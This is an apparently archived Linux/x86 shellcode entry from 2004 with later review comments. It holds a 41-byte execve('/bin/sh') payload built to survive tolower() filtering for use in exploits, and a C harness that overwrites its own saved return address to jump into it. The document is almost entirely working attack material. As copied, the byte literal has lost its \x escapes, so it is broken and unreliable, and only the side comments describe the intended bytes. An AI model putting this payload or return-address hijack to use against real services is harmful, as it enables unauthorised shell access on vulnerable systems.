
# Title : linux/x86 execve /bin/sh tolower() evasion 41 bytes
# Published : 2004-09-12
# Author : n/a


/*
 *  Linux/x86
 *  tolower() evasion, execve() /bin/sh 
 *  (e.g. as used in various qpop exploits)
 */

#include <stdio.h>

/*
 * Payload bytes as a C string literal.
 *
 * NOTE(review): the backslashes of the \x escapes are missing from this
 * copy ("xebx1b" and so on), so as written the literal holds ASCII letters
 * and digits rather than the machine-code bytes the side comments describe.
 * The side comments are the only reliable description of the intended bytes.
 *
 * Intended structure, per those comments: the jmp/call pair leaves the
 * address of the trailing "/bin/sh" bytes in %esi (the call pushes it as
 * its return address); the code then writes a NUL terminator and a
 * two-slot argv directly after the string -- so the payload only works if
 * it sits in memory that is both writable and executable -- and finally
 * issues int $0x80 with %eax == 11, the execve number on 32-bit Linux.
 * Byte budget: 2 (jmp) + 27 (start..int) + 5 (call) + 7 (data) = 41,
 * matching the title. "tolower() evasion" presumably refers to byte
 * choice: none of the documented bytes lie in 0x41..0x5a ('A'..'Z'), so
 * a filter that lowercases its input leaves the payload unchanged.
 */
char c0de[] =
/* main: */
"xebx1b"                                   /* jmp callz   (+27 bytes)     */
/* start: */
"x5e"                                       /* popl %esi   = &"/bin/sh"    */
"x89xf3"                                   /* movl %esi, %ebx  (filename)*/
"x89xf7"                                   /* movl %esi, %edi            */
"x83xc7x07"                               /* addl $0x07, %edi (past str)*/
"x29xc0"                                   /* subl %eax, %eax  (eax = 0) */
"xaa"                                       /* stosb: NUL-terminate string*/
"x89xf9"                                   /* movl %edi, %ecx  (argv)    */
"x89xf0"                                   /* movl %esi, %eax            */
"xab"                                       /* stosl: argv[0] = &"/bin/sh"*/
"x89xfa"                                   /* movl %edi, %edx  (envp)    */
"x29xc0"                                   /* subl %eax, %eax  (eax = 0) */
"xab"                                       /* stosl: argv[1] = envp[0]=0 */
"xb0x08"                                   /* movb $0x08, %al            */
"x04x03"                                   /* addb $0x03, %al  (al = 11) */
"xcdx80"                                   /* int $0x80   (execve)       */
/* callz: */
"xe8xe0xffxffxff"                       /* call start  (-32 bytes)    */
/* DATA: 7 bytes, not NUL-terminated here; the stosb above supplies it */
"/bin/sh";

/*
 * Test harness: prints the payload length, then redirects control into c0de
 * by writing through a pointer computed from the address of a local.
 *
 * NOTE(review): `main()` with an implicit int return type and `strlen`
 * without <string.h> depend on pre-C99 implicit declarations and will not
 * build cleanly with a modern compiler. The trailing "n" in the format
 * string is presumably a "\n" whose backslash was lost in the same way as
 * the \x escapes in c0de, and "lenght" is a typo in the output text.
 *
 * `(int *)&ret + 2` points two ints beyond a local object; dereferencing
 * it is out-of-bounds access (undefined behaviour). It presumably targets
 * the saved return address of this frame on 32-bit x86 (ret, saved %ebp,
 * return address), which only holds for one particular compiler frame
 * layout; `(int)c0de` also truncates the pointer on 64-bit targets. On
 * systems with non-executable data/stack, stack protectors, or a 64-bit
 * ABI the write either faults or jumps nowhere useful.
 */
main() {
        int *ret;
        /* layout-dependent pointer into this frame; see note above */
        ret=(int *)&ret +2;
        printf("Shellcode lenght=%dn",strlen(c0de));
        /* replace whatever lives two ints above `ret` with &c0de[0] */
        (*ret) = (int)c0de;
}

// www.Syue.com [2004-09-12]